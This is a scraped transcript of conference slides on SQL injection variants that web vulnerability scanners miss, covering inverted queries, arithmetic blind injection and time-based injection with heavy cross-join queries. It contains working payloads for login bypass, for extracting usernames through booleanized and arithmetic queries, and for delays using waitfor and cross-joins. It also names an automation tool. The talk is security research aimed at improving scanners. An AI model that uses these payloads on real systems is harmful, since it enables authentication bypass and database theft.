how "·$% developers defeat the web vulnerability scanners
DESCRIPTION
Share Favorite Favorited X Download More... Favorited! Want to add tags? Have an opinion? Make a quick comment as well. Cancel Edit your favorites Cancel Send to your Group / Event Select Group / Event Add your message Cancel Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed For WordPress.com Without related presentations 0 commentsPost a comment Post a comment .. Embed Video Subscribe to follow-up comments Unsubscribe from followup comments . Edit your comment Cancel .Notes on slide 1 no notes for slide #1 no notes for slide #1 ..Favorites, Groups & Events more How "·$% developers defeat the web vulnerability scanners - Presentation Transcript 1.How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica 2.Agenda 1.- Introduction 2.- Inverted Queries 3.- Arithmetic Blind SQL Injection 4.- Time-Based Blind SQL Injection using Heavey Queries 5.- Conclusions 3.1.-Introduction 4.SQL Injection is still here among us 5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs 6.Need to Improve Automatic Scanning Not always a manual scanning is possible Time Confidentiality Money, money, money… Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. 7.2.-Inverted Queries 8. 9.Homers, how are they? Lazy Bad trainined Poor Experience in security stuff Don´t like working Don´t like computing Don´t like coding Don´t like you! 10.Flanders are Left-handed 11.Right SELECT UID FROM USERS WHERE NAME=‘V_NAME’ AND PASSWORD=‘V_PASSW’; 12.Wrong? SELECT UID FROM USERS WHERE ‘V_NAME’=NAME AND ‘ V_PASSW’=PASSWORD 13.Login Inverted Query Select uid From users where ‘v_name’=name and ‘v_pass’=password http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1 Select uid From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password FAIL 14.Login Inverted SQL Injection an example Select uid From users where ‘v_name’=name and ‘v_pass’=password http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica Select uid From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password Success 15.Blind Attacks Attacker injects code but can´t access directly to the data. However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection Biind Xpath Injection Blind LDAP Injection 16.Blind SQL Injection Attacks Attacker injects: “ True where clauses” “ False where clauses“ Ex: Program.php?id=1 and 1=1 Program.php?id=1 and 1=2 Program doesn’t return any visible data from database or data in error messages. The attacker can´t see any data extracted from the database. 17.Blind SQL Injection Attacks Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: Different hashes Different html structure Different patterns (keywords) Different linear ASCII sums “ Different behavior” By example: Response Time 18.Blind SQL Injection Attacks If any difference exists, then: Attacker can extract all information from database How? Using “booleanization” MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) “ True-Answer Page” or “False-Answer Page”? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(SubTRANSCRIPT
![Page 1: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/1.jpg)
How ?¿$·& developers defeat the most famous web
vulnerability scanners …or how to recognize old
friends
Chema AlonsoInformática64
José ParadaMicrosoft Ibérica
![Page 2: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/2.jpg)
Agenda
1.- Introduction2.- Inverted Queries3.- Arithmetic Blind SQL Injection4.- Time-Based Blind SQL Injection using Heavey
Queries5.- Conclusions
![Page 3: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/3.jpg)
1.-Introduction
![Page 4: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/4.jpg)
SQL Injection is still here among us
![Page 5: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/5.jpg)
Web Application Security Consortium: Comparision
http://projects.webappsec.org/Web-Application-Security-Statistics
12.186 sites97.554 bugs
![Page 6: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/6.jpg)
Need to Improve Automatic Scanning
• Not always a manual scanning is possible– Time– Confidentiality– Money, money, money…
• Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools.
![Page 7: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/7.jpg)
2.-Inverted Queries
![Page 8: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/8.jpg)
![Page 9: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/9.jpg)
Homers, how are they?
• Lazy• Bad trainined• Poor Experience in
security stuff• Don´t like working• Don´t like computing• Don´t like coding• Don´t like you!
![Page 10: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/10.jpg)
Flanders are Left-handed
![Page 11: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/11.jpg)
Right
SELECT UIDFROM USERSWHERE NAME=‘V_NAME’ ANDPASSWORD=‘V_PASSW’;
![Page 12: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/12.jpg)
Wrong?
SELECT UIDFROM USERSWHERE ‘V_NAME’=NAME
AND‘V_PASSW’=PASSWORD
![Page 13: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/13.jpg)
Login Inverted QuerySelect uidFrom users where ‘v_name’=name and
‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1
Select uidFrom users where ‘Robert’=name and ‘Kubica’ or
‘1’=‘1’=password FAIL
![Page 14: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/14.jpg)
Login Inverted SQL Injectionan example
Select uidFrom users where ‘v_name’=name and
‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica
Select uidFrom users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or
‘Kubica’=password Success
![Page 15: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/15.jpg)
Blind Attacks• Attacker injects code but can´t access directly to
the data.• However this injection changes the behavior of
the web application. • Then the attacker looks for differences between
true code injections (1=1) and false code injections (1=2) in the response pages to extract data.– Blind SQL Injection– Biind Xpath Injection– Blind LDAP Injection
![Page 16: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/16.jpg)
Blind SQL Injection Attacks
• Attacker injects:– “True where clauses”– “False where clauses“– Ex:
• Program.php?id=1 and 1=1• Program.php?id=1 and 1=2
• Program doesn’t return any visible data from database or data in error messages.
• The attacker can´t see any data extracted from the database.
![Page 17: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/17.jpg)
Blind SQL Injection Attacks
• Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:– Different hashes– Different html structure– Different patterns (keywords)– Different linear ASCII sums– “Different behavior”• By example: Response Time
![Page 18: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/18.jpg)
Blind SQL Injection Attacks
• If any difference exists, then:– Attacker can extract all information from database– How? Using “booleanization”
• MySQL:– Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
» “True-Answer Page” or “False-Answer Page”?• MSSQL:
– Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)
• Oracle:– Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)))
from all_users where rownum<=1)
![Page 19: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/19.jpg)
Blind Inverted QuerySelect productFrom productsWhere v_value=id;
http://www.web.com/products.php?v_value=2 and 1=1
Select productFrom productsWhere 2 and 1=1=id;-> FAIL
![Page 20: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/20.jpg)
The MySQL Case1 is True1=1=1 ->True1=1=(1+1-1)=abs(1)=1 -> True2=2=2 ->False-> 2=2 becomes True -> True=2-> True is equals to 1 then 1=2 is False
Select productFrom productsWhere v_value=id;
http://www.web.com/products.php?v_value=1 and 1=1
Select productFrom productsWhere 1 and 1=1=id;-> SUCCES (if there is a Id=1)
![Page 21: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/21.jpg)
Web Scanner behaviors
• Acunetix• Paros• AppScan• W3af• Wapiti• Proxy Strike
![Page 22: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/22.jpg)
Acunetix & Homer
![Page 23: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/23.jpg)
Acunetix & Flanders
![Page 24: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/24.jpg)
AppScan & Homer
![Page 25: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/25.jpg)
AppScan & Flanders
![Page 26: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/26.jpg)
Paros & Homer
![Page 27: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/27.jpg)
Paros & Flanders
![Page 28: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/28.jpg)
W3af & Homer
![Page 29: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/29.jpg)
W3af & Flanders
![Page 30: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/30.jpg)
Wapiti & Homer
![Page 31: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/31.jpg)
Wapiti & Flanders
![Page 32: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/32.jpg)
Demo
• W3af• Wapiti• Proxy Strike
![Page 33: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/33.jpg)
Results
Normal Inverted MySQL MS SQL Server MySQL MS SQL Server
Numeric String Numeric String Numeric String Numeric String
Paros
AppScan
Acunetix
w3af
wapiti
Proxy Strike
![Page 34: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/34.jpg)
In the end…
OUCH!!! Thank God for keep me safe
![Page 35: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/35.jpg)
Solutions?
• Concat string injection• Arithmetic Blind SQL Injection• Time-Based Blind SQL injection– Delay Functions– Heavy queries
![Page 36: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/36.jpg)
3.- Arithmetic
![Page 37: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/37.jpg)
What about this queries?• How to detect/exploit this Blind SQLinjection
vulnerability?– The query forces the parameter to be numeric – SELECT field FROM table WHERE id=abs(param)– Ex:
Get Param(ID)Select ….. Where att1=abs(ID)Select ….. Where att2=k1-IDPrint response
• Not AND or OR operators can be used.• Boolean logic needs to be created with math
operations
![Page 38: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/38.jpg)
Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)– Id=A+(1/(ASCII(B)-C))•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]
– TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception.
![Page 39: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/39.jpg)
Arithmetic Blind SQL Injection• Sums and subtractions– Id=A+ASCII(B)-C•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]
– When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
![Page 40: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/40.jpg)
Arithmetic Blind SQL Injection
• Value type overflow– Id=A+((C/ASCII(B))*(K))•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]•K-> Value that overflows the type defined for A
–(e.g. if A is integer, then K=2^32)
– When C/ASCII(B)==1, K*1 overflows the data type
![Page 41: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/41.jpg)
Demo:
• Divide by zero• Sums and subtractions• Integer overflow
![Page 42: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/42.jpg)
Conclusions
• Arithmetic Blind SQL Injection allows to construct binary logic without “AND” and “OR”.– detects bugs in this kind of queries…– And also in Inverted queries in which a numeric
value is used
• Almost none of the vulnerability scanners are using this method
![Page 43: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/43.jpg)
4.-Time-based Blind SQL Injection using heavy queries
![Page 44: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/44.jpg)
Time-Based Blind SQL Injection• In scenarios with no differences between “True-
Answer Page” and “False-Answer Page”, time delays can be used.
• Injection forces a delay in the response page when the condition injected is True. - Delay functions:
• SQL Server: waitfor • Oracle: dbms_lock.sleep• MySQL: sleep or Benchmark Function• Postgres: pg_sleep
– Ex:• ; if (exists(select * from users)) waitfor delay '0:0:5’
![Page 45: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/45.jpg)
Time-Based Blind SQL InjectionWhat about DBs without delay functions, i.e.:
Oracle connections MS Access DB2without PL/SQL injection
Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?
![Page 46: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/46.jpg)
![Page 47: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/47.jpg)
“Where-Clause” execution order
Select “whatever “From whateverWhere condition1 and condition2
- Condition1 lasts 10 seconds- Condition2 lasts 100 seconds
Which condition should be executed first?
![Page 48: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/48.jpg)
The heavy condition first
Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time
TRUE FALSE FALSE 110 sec
TRUE TRUE TRUE 110 sec
FALSE Not evaluated FALSE 100 sec
![Page 49: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/49.jpg)
The light condition first
Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time
TRUE FALSE FALSE 110 sec
TRUE TRUE TRUE 110 sec
FALSE Not evaluated FALSE 10 sec
![Page 50: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/50.jpg)
Time-Based Blind SQL Injectionusing Heavy Queries
• Attacker can perform an exploitation delaying the “True-answer page” using a heavy query.
• It depends on how the database engine evaluates the where clauses in the query.
• There are two types of database engines:– Databases without optimization process– Databases with optimization process
![Page 51: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/51.jpg)
Time-Based Blind SQL Injectionusing Heavy Queries
• Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections.
• The Cross-join injection must be heavier than the other condition.
• Attacker only have to know or to guess the name of a table with select permission in the database.
• Example in MSSQL:– Program.php?id=1 and (SELECT count(*) FROM sysusers
AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
![Page 52: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/52.jpg)
“Default” tables to construct a heavy query
– Microsoft SQL Server• sysusers
– Oracle• all_users
– MySQL (versión 5)• information_schema.columns
– Microsoft Access• MSysAccessObjects (97 & 2000 versions)• MSysAccessStorage (2003 & 2007)
52
![Page 53: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/53.jpg)
“Default” tables to construct a heavy query
• …or whatever you can guess– Clients– Customers– News– Logins– Users– Providers– ….Use your imagination…
![Page 54: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/54.jpg)
Ex 1: MS SQL Server
Query takes 14 seconds -> True-Answer
![Page 55: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/55.jpg)
Ex 1: MS SQL Server
• Query takes 1 second -> False-Answer
![Page 56: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/56.jpg)
Ex 2: Oracle
Query Takes 22 seconds –> True-Answer
![Page 57: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/57.jpg)
Ex 2: Oracle
Query Takes 1 second –> False-Answer
![Page 58: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/58.jpg)
Ex 3: Access 2007
Query Takes 39 seconds –> True-Answer
![Page 59: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/59.jpg)
Ex 3: Access 2007
Query Takes 1 second –> False-Answer
![Page 60: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/60.jpg)
Marathon Tool
• Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.
• Schema Extraction from known databases• Extract data using heavy queries not matter in
which database engine (without schema)• Developed in .NET• Source code available• http://www.codeplex.com/marathontool
![Page 61: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/61.jpg)
Demo: Marathon Tool
![Page 62: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/62.jpg)
5.- Conclusions
![Page 63: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/63.jpg)
The real world has plenty kinds of developers…
![Page 64: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/64.jpg)
References• Inverted SQL queries (Spanish)http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html • Arithemtic Blind SQL Injection (spanish)http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-
de-ii.html • Time-Based Blind SQL Injection Using heavy queries & Marathon Toolhttp://www.defcon.org/images/defcon-16/dc16-presentations/alonso-
parada/defcon-16-alonso-parada-wp.pdf • Marathon Toolhttp://www.codeplex.com/marathontool • Connection String Attacks (spanish)http://www.slideshare.net/chemai64/connection-string-parameter-pollution
![Page 65: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/65.jpg)
Don´t complain about your job!!